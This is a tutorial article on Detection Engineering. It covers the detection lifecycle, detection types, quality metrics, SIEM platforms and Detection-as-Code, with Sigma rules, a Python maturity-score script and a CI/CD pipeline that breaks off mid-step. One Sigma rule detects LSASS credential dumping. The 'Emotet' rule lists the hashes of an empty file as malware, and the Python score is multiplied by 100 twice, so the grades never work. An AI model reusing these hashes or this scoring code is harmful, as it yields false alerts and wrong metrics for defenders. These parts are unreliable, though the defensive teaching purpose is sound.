01 - Detection Engineering: from Discipline to Script to Pipeline
In an ever-evolving threat landscape, the ability to detect malicious activity before it causes significant damage represents the true differentiator between a resilient organization and a vulnerable one. For decades, threat detection was entrusted to ad-hoc rules, antivirus signatures, and individual SOC analysts' intuition. Today, this artisanal approach is no longer sustainable: the volume of logs, the complexity of cloud-native infrastructure, and the sophistication of attackers demand an engineering-driven, systematic approach.
This is how Detection Engineering was born: a discipline that applies software engineering principles to the process of creating, testing, deploying, and maintaining detection rules. It is no longer about writing isolated queries in a SIEM, but about building automated pipelines, versioning detections as code, testing them with simulated data, and measuring them with objective metrics.
What You Will Learn in This Article
- What Detection Engineering is and why it has become a standalone discipline
- The evolution from ad-hoc scripts to CI/CD pipelines for detections
- The complete detection lifecycle: hypothesis, development, testing, deployment, tuning
- Main detection types: signature-based, behavioral, anomaly-based
- Quality metrics: True Positive Rate, False Positive Rate, MTTD, MTTR
- The SIEM/SOAR ecosystem and fundamental data sources
- The Detection-as-Code concept and CI/CD pipelines for security rules
- Practical examples with Sigma rules, Python scripts, and YAML configurations
What is Detection Engineering
Detection Engineering is the systematic process of designing, developing, testing, and maintaining logic that identifies malicious activity within an organization's telemetry. This telemetry includes logs from endpoints, cloud infrastructure, identity providers, web applications, network systems, and much more.
Unlike the traditional approach, where a SOC analyst would write a query in the SIEM in response to a specific incident, Detection Engineering adopts a structured workflow resembling modern software development: code versioning, code review, automated testing, continuous deployment, and production performance monitoring.
"Detection Engineering is to SOC what Software Engineering is to coding: it transforms an ad-hoc, reactive activity into a systematic, measurable, and continuously improving discipline."
- SANS Institute, 2025 Detection Engineering Survey
The Three Pillars of Detection Engineering
The discipline is built on three interconnected pillars that define its maturity:
- Threat Intelligence - Understanding who the adversaries are, what techniques they use (MITRE ATT&CK), and which organizational assets are at risk. Without a deep understanding of threats, detections will be generic and ineffective.
- Data Engineering - Ensuring that necessary logs are collected, normalized, and available for analysis. A perfect detection is useless if the data it operates on is missing or of poor quality.
- Software Engineering - Applying software development best practices: version control, testing, CI/CD, documentation, metrics. Detections must be treated as production code.
The Evolution: from Ad-Hoc Scripts to an Engineering Discipline
The journey that led to modern Detection Engineering can be divided into four distinct phases, each characterized by increasing levels of maturity and automation.
Phase 1: The Signature Era (1990-2005)
The earliest forms of detection relied on static signatures: known malware patterns, hashes of malicious files, specific strings in network payloads. Every antivirus and IDS (Intrusion Detection System) maintained a signature database that was periodically updated. The approach worked reasonably well with known threats but was completely blind to new variants or customized attacks.
Phase 2: The SIEM Script Era (2005-2015)
With the spread of the first SIEMs (Security Information and Event Management), analysts began writing custom queries and correlations. Each analyst had their own approach, their own scripts, their own naming conventions. Rules were created directly in the SIEM's web interface, with no versioning, no testing, no standardized documentation. When an analyst left the organization, their detections often became incomprehensible to successors.
Phase 3: The Birth of Detection Engineering (2015-2022)
Between 2015 and 2022, the security community began recognizing the need for a more structured approach. Standard formats like Sigma (2017) emerged for detection rules, the MITRE ATT&CK framework became the universal reference for mapping adversary techniques, and the first dedicated Detection Engineering teams appeared in more mature organizations.
Phase 4: Detection-as-Code and CI/CD Pipelines (2022-present)
Today, the most advanced organizations treat detections exactly like software code. Rules are written in declarative formats (Sigma, YAML), versioned in Git repositories, automatically tested with simulated data, deployed via CI/CD pipelines, and monitored with dedicated dashboards. According to the SANS 2025 Detection Engineering Survey, 60% of organizations maintain dedicated Detection Engineering teams, with 70% of enterprises with over 5,000 employees having already established structured teams.
| Phase | Period | Approach | Tools | Limitations |
|---|---|---|---|---|
| Static Signatures | 1990-2005 | Pattern matching on known signatures | Antivirus, IDS (Snort) | Zero-day invisible, high latency |
| SIEM Scripts | 2005-2015 | Ad-hoc queries in SIEM | Splunk, ArcSight, QRadar | Unversioned, untested, knowledge siloed |
| Detection Engineering | 2015-2022 | Structured workflow with standards | Sigma, ATT&CK, ELK | Still many manual processes |
| Detection-as-Code | 2022-present | CI/CD pipelines, everything versioned | Git, CI/CD, Sigma, SOAR | Requires organizational maturity |
The Detection Lifecycle
Every detection follows a well-defined lifecycle that ensures quality, effectiveness, and long-term maintainability. The cycle consists of six fundamental phases, each with specific deliverables and quality criteria.
1. Hypothesis
Everything starts with a threat hypothesis. The analyst or detection engineer identifies a specific attack technique (for example, "An attacker might use PowerShell to download and execute malicious payloads") and formulates a hypothesis about how this activity would manifest in available logs. Sources for hypotheses include:
- Threat Intelligence - Reports on active campaigns, observed TTPs
- MITRE ATT&CK - Techniques mapped to specific tactics
- Incident post-mortems - Lessons learned from previous incidents
- Red Team findings - Results from penetration tests and purple teaming
- Gap analysis - ATT&CK techniques without detection coverage
2. Development
With the hypothesis defined, the detection engineer writes the detection rule. This involves choosing the format (Sigma, native SIEM query, Python script), defining the required log sources, the selection and filtering logic, and documenting metadata (author, severity, ATT&CK mapping, known false positives).
3. Testing and Validation
Before deployment, the detection must be validated against real and simulated data. Testing includes: true positive testing (does the rule detect the simulated attack?), false positive testing (does the rule generate alerts on legitimate activity?), and performance testing (is the rule sufficiently performant on production log volumes?).
4. Deployment
Deployment occurs through automated pipelines that convert the rule to the target SIEM's native format, distribute it to the production environment, and verify its correct operation. In mature environments, this process is fully automated via CI/CD.
5. Monitoring and Metrics
Once in production, the detection is constantly monitored. Key metrics include the volume of generated alerts, the true/false positive ratio, mean time to detect (MTTD), and the impact on SOC analyst workload.
6. Tuning and Maintenance
Based on data collected in production, the detection is continuously refined. Tuning may include adding exceptions for recurring false positives, expanding the logic to cover technique variants, or deprecating the rule if it is no longer relevant.
Best Practice: Purple Teaming
Purple teaming significantly accelerates the detection lifecycle feedback loop. By combining the Red Team's offensive skills with the Blue Team's defensive capabilities, it is possible to simulate real attack techniques and validate detections in real time, reducing the time from hypothesis to validated detection from weeks to hours.
Detection Types: from IOC to Behavior
Detections can be classified based on the detection logic used. Each type has specific advantages and limitations, and a mature detection program combines all of them in a layered approach.
1. Signature-Based Detection
Signature-based detection looks for exact patterns in data: known file hashes, specific command strings, known malicious IP addresses or domains (IOC - Indicators of Compromise). It is the simplest and fastest type, with a very low false positive rate, but completely ineffective against new threats or variants.
title: Emotet Loader Hash Detection
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: stable
description: Detects known Emotet loader by file hash
author: Detection Engineering Team
date: 2025/10/15
references:
- https://attack.mitre.org/software/S0367/
logsource:
category: file_event
product: windows
detection:
selection:
Hashes|contains:
- 'SHA256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
- 'SHA256=a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a'
- 'MD5=d41d8cd98f00b204e9800998ecf8427e'
condition: selection
falsepositives:
- Unlikely, known malicious hashes
level: critical
tags:
- attack.execution
- attack.t1204.002
2. Behavioral Detection
Behavioral detections look for sequences of actions or behavior patterns indicating suspicious activity, regardless of specific IOCs. For example, instead of searching for a specific Mimikatz hash, a behavioral detection might look for any process accessing LSASS memory to extract credentials. This approach is much more resistant to evasion, because attackers can change their tools but can hardly change the underlying technique.
title: Suspicious LSASS Process Access - Credential Dumping
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: |
Detects process access to LSASS memory, a common technique
for credential dumping (T1003.001). Focuses on behavior
rather than specific tool signatures.
author: Federico Calo
date: 2025/11/20
references:
- https://attack.mitre.org/techniques/T1003/001/
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess|contains:
- '0x1010' # PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ
- '0x1038' # Read memory access
- '0x1FFFFF' # PROCESS_ALL_ACCESS
filter_legitimate:
SourceImage|endswith:
- '\MsMpEng.exe' # Windows Defender
- '\csrss.exe' # Client Server Runtime
- '\wmiprvse.exe' # WMI Provider
- '\svchost.exe' # Service Host
filter_system:
SourceUser|contains: 'SYSTEM'
SourceImage|startswith: 'C:\Windows\System32\'
condition: selection and not filter_legitimate and not filter_system
falsepositives:
- Legitimate security tools performing memory scanning
- EDR solutions with high-privilege access
level: high
tags:
- attack.credential_access
- attack.t1003.001
3. Anomaly-Based Detection
Anomaly-based detections establish a baseline of normalcy and flag significant deviations. For example, if a user typically logs in from Italy during business hours, a login from China at 3 AM would be an anomaly. This approach can detect completely unknown threats (zero-day), but tends to generate more false positives, especially in dynamic environments.
4. Threat Hunting
Threat Hunting is a proactive, hypothesis-driven process where analysts actively search for threats that may have evaded automated detections. Unlike automated detections, threat hunting is exploratory and often produces new detections that are then codified and automated.
| Detection Type | Precision | Zero-Day Coverage | False Positives | Maintenance | Example |
|---|---|---|---|---|---|
| Signature-Based | Very high | None | Very low | High (IOC updates) | File hashes, malicious IPs |
| Behavioral | High | Good | Moderate | Medium | LSASS access, lateral movement |
| Anomaly-Based | Variable | Excellent | High | High (baseline tuning) | Anomalous login, unusual traffic |
| Threat Hunting | Very high | Excellent | Minimal (manual) | High (requires analysts) | Exploratory analysis, hypotheses |
Detection Quality Metrics
A detection is not useful if it is not measurable. Quality metrics allow evaluating the effectiveness of detection rules, guiding the tuning process, and justifying investments in the Detection Engineering program.
Core Operational Metrics
| Metric | Description | Target | How to Improve |
|---|---|---|---|
| MTTD (Mean Time to Detect) | Average time from malicious activity to alert generation | < 4 hours (top teams: < 30 min) | Better log coverage, real-time detection |
| MTTR (Mean Time to Respond) | Average time from detection to containment/resolution | < 4 hours | SOAR automation, defined playbooks |
| True Positive Rate (TPR) | Percentage of alerts that correspond to real threats | > 80% for critical, > 60% for high | Continuous tuning, advanced filtering |
| False Positive Rate (FPR) | Percentage of alerts generated for legitimate activity | < 25% for critical | Whitelists, enriched context, correlation |
| False Negative Rate (FNR) | Percentage of real threats not detected | < 1% | Purple teaming, threat hunting |
| ATT&CK Coverage | Percentage of MITRE ATT&CK techniques covered by at least one detection | > 70% of relevant techniques | Regular gap analysis, prioritization |
Calculating the Detection Score
A practical approach to evaluating the overall quality of a detection program is the Detection Maturity Score, which combines several metrics into a normalized score. Here is a Python calculation example:
from dataclasses import dataclass
from typing import List
@dataclass(frozen=True)
class DetectionMetrics:
"""Immutable snapshot of detection performance metrics."""
rule_id: str
true_positives: int
false_positives: int
false_negatives: int
total_alerts: int
avg_detection_time_minutes: float # MTTD
avg_response_time_minutes: float # MTTR
@property
def precision(self) -> float:
"""TP / (TP + FP) - How many alerts are real threats."""
denominator = self.true_positives + self.false_positives
return self.true_positives / denominator if denominator > 0 else 0.0
@property
def recall(self) -> float:
"""TP / (TP + FN) - How many real threats are caught."""
denominator = self.true_positives + self.false_negatives
return self.true_positives / denominator if denominator > 0 else 0.0
@property
def f1_score(self) -> float:
"""Harmonic mean of precision and recall."""
p, r = self.precision, self.recall
return 2 * (p * r) / (p + r) if (p + r) > 0 else 0.0
def calculate_maturity_score(metrics_list: List[DetectionMetrics]) -> dict:
"""Calculate overall detection program maturity score.
Returns an immutable dict with aggregated metrics.
"""
if not metrics_list:
return {"score": 0, "grade": "F", "details": {}}
avg_precision = sum(m.precision for m in metrics_list) / len(metrics_list)
avg_recall = sum(m.recall for m in metrics_list) / len(metrics_list)
avg_f1 = sum(m.f1_score for m in metrics_list) / len(metrics_list)
avg_mttd = sum(m.avg_detection_time_minutes for m in metrics_list) / len(metrics_list)
avg_mttr = sum(m.avg_response_time_minutes for m in metrics_list) / len(metrics_list)
# Weighted maturity score (0-100)
precision_score = avg_precision * 25 # 25% weight
recall_score = avg_recall * 25 # 25% weight
f1_component = avg_f1 * 20 # 20% weight
mttd_score = max(0, (240 - avg_mttd) / 240) * 15 # 15% weight (240min = 4h target)
mttr_score = max(0, (240 - avg_mttr) / 240) * 15 # 15% weight
total_score = (precision_score + recall_score + f1_component
+ mttd_score + mttr_score) * 100
grade_thresholds = [
(90, "A"), (80, "B"), (70, "C"), (60, "D")
]
grade = next(
(g for threshold, g in grade_thresholds if total_score >= threshold),
"F"
)
return {
"score": round(total_score, 1),
"grade": grade,
"details": {
"avg_precision": round(avg_precision, 3),
"avg_recall": round(avg_recall, 3),
"avg_f1": round(avg_f1, 3),
"avg_mttd_minutes": round(avg_mttd, 1),
"avg_mttr_minutes": round(avg_mttr, 1),
"total_rules_evaluated": len(metrics_list),
},
}
# Usage example
sample_metrics = [
DetectionMetrics("SIGMA-001", 45, 5, 2, 50, 15.0, 35.0),
DetectionMetrics("SIGMA-002", 120, 30, 8, 150, 8.5, 22.0),
DetectionMetrics("SIGMA-003", 200, 15, 5, 215, 3.2, 12.0),
]
result = calculate_maturity_score(sample_metrics)
print(f"Detection Maturity Score: {result['score']} ({result['grade']})")
print(f"Details: {result['details']}")
Warning: Vanity Metrics
Avoid measuring your detection program's success by the total number of rules or the number of alerts generated. These are vanity metrics that can mask serious problems. An organization with 50 high-fidelity detections is far more secure than one with 5,000 rules generating thousands of false positives and causing alert fatigue in analysts.
The SIEM/SOAR Ecosystem
The SIEM (Security Information and Event Management) is the heart of Detection Engineering infrastructure. It is the platform that collects, normalizes, correlates, and analyzes logs from all organizational sources. SOAR (Security Orchestration, Automation and Response) complements the SIEM by automating responses to alerts through predefined playbooks.
Overview of Major SIEM Platforms
| Platform | Type | Query Language | Strengths | Ideal Use Case |
|---|---|---|---|---|
| Splunk Enterprise | On-prem / Cloud | SPL | Maturity, app ecosystem, flexibility | Complex enterprises, mature SOCs |
| Elastic SIEM | Open Source / Cloud | KQL / EQL / ES|QL | Open source, scalability, cost | Budget-constrained teams, cloud-native |
| Microsoft Sentinel | Cloud (Azure) | KQL | Azure/M365 integration, built-in AI | Microsoft-centric organizations |
| Google SecOps (Chronicle) | Cloud (GCP) | YARA-L | Unlimited retention, speed | Large data volumes, GCP |
| CrowdStrike Falcon LogScale | Cloud | LogScale Query | Fast ingestion, compression | CrowdStrike organizations |
| Sumo Logic | Cloud | Sumo Logic Query | SaaS-native, ease of use | Cloud-first, SaaS-heavy |
Fundamental Data Sources
Detection quality depends directly on the quality and completeness of available data. Here are the fundamental data sources for an effective detection program:
- Endpoint Telemetry - Process logs, file system events, registry changes, network connections. Sources: EDR (CrowdStrike, SentinelOne, Microsoft Defender), Sysmon
- Network Telemetry - NetFlow, DNS queries, HTTP/TLS metadata, selective PCAPs. Sources: firewalls, IDS/IPS, proxies, DNS resolvers
- Identity & Access - Authentication events, privilege escalation, group membership changes. Sources: Active Directory, Entra ID, Okta, CyberArk
- Cloud Audit Logs - API calls, configuration changes, resource creation. Sources: AWS CloudTrail, Azure Activity Log, GCP Audit Logs
- Application Logs - Web server access logs, application errors, WAF events. Sources: Nginx, Apache, CloudFront, custom applications
- Email Security - Phishing attempts, malicious attachments, BEC detection. Sources: Microsoft Defender for O365, Proofpoint, Mimecast
Data Normalization: the Invisible Foundation
Without data normalization, detections are fragile and non-portable.
Every SIEM and every source uses different formats for the same concepts: a "failed login"
may appear as EventID 4625 in Windows, sshd: Failed password
in Linux, or {"eventType": "user.session.start", "outcome": "FAILURE"}
in Okta. Adopting a normalization schema like ECS (Elastic Common Schema),
OCSF (Open Cybersecurity Schema Framework), or Sigma's data model allows
writing detections once and applying them across any source.
Detection-as-Code: the Modern Paradigm
Detection-as-Code (DaC) is the approach that applies software development practices to detection rule management. Instead of creating and modifying rules through the SIEM's graphical interface, detections are written as code, versioned in Git repositories, subjected to code review via pull requests, automatically tested, and deployed through CI/CD pipelines.
Detection-as-Code Advantages
Compared to Traditional Approach
- Versioning - Every change is tracked in Git, with rollback capability
- Code Review - Detections undergo peer review before deployment
- Automated Testing - Automatic validation with positive and negative data
- Reproducibility - The entire detection state is reconstructable from the repository
Operational Benefits
- Speed - Detections go to production in minutes, not days
- Consistency - Quality standards applied uniformly
- Audit Trail - Complete traceability for compliance
- Collaboration - Multiple teams can contribute to the same repository
Detection-as-Code Repository Structure
detections/
rules/
credential_access/
lsass_memory_access.yml
brute_force_login.yml
kerberoasting.yml
execution/
powershell_encoded_command.yml
suspicious_wmi_execution.yml
lateral_movement/
psexec_usage.yml
rdp_from_unusual_source.yml
persistence/
scheduled_task_creation.yml
registry_run_key.yml
tests/
credential_access/
lsass_memory_access_test.json
brute_force_login_test.json
execution/
powershell_encoded_command_test.json
config/
sigma_config.yml
siem_mappings.yml
exclusions.yml
pipelines/
ci.yml
cd.yml
docs/
CONTRIBUTING.md
STYLE_GUIDE.md
REVIEW_CHECKLIST.md
README.md
CI/CD Pipeline for Detections
The CI/CD pipeline for detections automates the entire process from commit to production. Here is a configuration example for GitHub Actions:
name: Detection CI/CD Pipeline
on:
pull_request:
paths: ['rules/**', 'tests/**']
push:
branches: [main]
paths: ['rules/**']
jobs:
validate:
name: Validate Sigma Rules
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Install sigma-cli
run: pip install sigma-cli pySigma-backend-splunk pySigma-backend-elasticsearch
- name: Lint Sigma Rules
run: |
sigma check rules/ --validation-config config/sigma_config.yml
echo "All rules pass validation"
- name: Verify ATT&CK Mapping
run: |
python scripts/verify_attack_tags.py rules/
echo "All rules have valid ATT&CK mappings"
test:
name: Test Detection Logic
needs: validate
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Run True Positive Tests
run: |
python scripts/run_tests.py \
--rules-dir rules/ \
--tests-dir tests/ \
--test-type true_positive
- name: Run False Positive Tests
run: |
python scripts/run_tests.py \
--rules-dir rules/ \
--tests-dir tests/ \
--test-type false_positive
- name: Generate Coverage Report
run: python scripts/coverage_report.py --output reports/coverage.json
deploy:
name: Deploy to SIEM
needs: test
if: github.ref == 'refs/heads/main'
runs-on: ubuntu-latest
environment: production
steps:
- uses: actions/checkout@v4
- name: Convert Sigma to Splunk SPL
run: |
sigma convert \
--target splunk \
--pipeline splunk_windows \
rules/ \
--output converted/splunk/
- name: Deploy to Splunk via API
env:
SPLUNK_TOKEN: 






